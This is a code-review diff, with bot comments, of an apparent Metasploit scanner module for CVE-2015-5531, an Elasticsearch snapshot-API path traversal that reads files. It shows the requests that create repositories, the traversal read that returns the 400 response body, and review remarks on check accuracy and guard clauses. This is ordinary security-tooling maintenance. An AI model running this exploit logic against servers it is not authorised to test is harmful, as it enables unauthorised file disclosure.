@@ -54,17 +54,21 @@ def check_host(ip)
5454 'data' => '{"type":"fs","settings":{"location":"dsr"}}'
5555 )
5656
57+ return Exploit ::CheckCode ::Unknown ( 'Failed to connect to the target.' ) unless res1
58+
5759 res2 = send_request_raw (
5860 'method' => 'POST' ,
5961 'uri' => normalize_uri ( target_uri . path , '_snapshot' , 'pwnie' ) ,
6062 'data' => '{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}'
6163 )
6264
65+ return Exploit ::CheckCode ::Unknown ( 'Failed to connect to the target.' ) unless res2
66+
6367 if res1 . body . include? ( 'true' ) && res2 . body . include? ( 'true' )
64- return Exploit ::CheckCode ::Appears
68+ return Exploit ::CheckCode ::Appears ( 'Successfully created snapshot repositories, suggesting the Snapshot API is vulnerable to CVE-2015-5531.' )
6569 end
6670
67- Exploit ::CheckCode ::Safe
71+ Exploit ::CheckCode ::Safe ( 'Failed to create snapshot repositories.' )
6872 end
6973
7074 def read_file ( file )
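Review bot: The Appears message added at new line 68 says the snapshot repositories were created, but the condition above it only checks that both response bodies contain the substring 'true' and never looks at the status code. Any HTTP service whose reply happens to contain that word would be reported as vulnerable to CVE-2015-5531, which costs whoever triages the scan output time on false positives. Tightening the test to `if res1.code == 200 && res2.code == 200 && res1.body.include?('true') && res2.body.include?('true')` would make the message match what was actually verified. Likewise, Safe at new line 71 is returned for every non-matching reply, which presumably includes authentication errors and non-Elasticsearch services, so Unknown may be the more accurate result unless the status shows the request was processed and refused.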
@@ -82,7 +86,12 @@ def read_file(file)
8286 'uri' => travs
8387 )
8488
85- if res && res . code == 400
89+ unless res
90+ print_error ( "No response received from the target." )
91+ return nil
92+ end
93+
94+ if res . code == 400
8695 return res . body
8796 else
8897 print_status ( "Server returned HTTP response code: #{ res . code } " )
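Review bot: The `if res.code == 400` branch at new line 94 needs a comment, because returning the body of an error response as the successful result reads like a mistake to anyone unfamiliar with the module. Something like `# A 400 reply is the expected outcome here; its body is what read_file hands back to the caller` would do, extended with a note on whether the caller still has to extract the file contents from that body, which is not visible here. The explicit `return nil` in the new `unless res` branch can be a bare `return`. read_file's else branch continues outside the hunk.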
@@ -95,8 +104,8 @@ def run_host(ip)
95104 vprint_status ( "Checking if it's a vulnerable ElasticSearch" )
96105
97106 check_code = check_host ( ip )
98- print_status ( " #{ check_code . message } " )
99- if check_host ( ip ) ! = Exploit ::CheckCode ::Appears
107+ print_status ( check_code . message )
108+ unless check_code = = Exploit ::CheckCode ::Appears
100109 return
101110 end
102111
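Review bot: The comparison `check_code == Exploit::CheckCode::Appears` at new line 108 now sets an object built with a custom reason string against the bare constant, so it only works if CheckCode equality ignores the message. That definition is not visible here and is worth confirming. If equality were message-sensitive, run_host would return early on every host and the scanner would silently report nothing. As a style point, the three-line `unless` / `return` / `end` reads better as a guard clause, `return unless check_code == Exploit::CheckCode::Appears`. run_host's body continues outside the hunk.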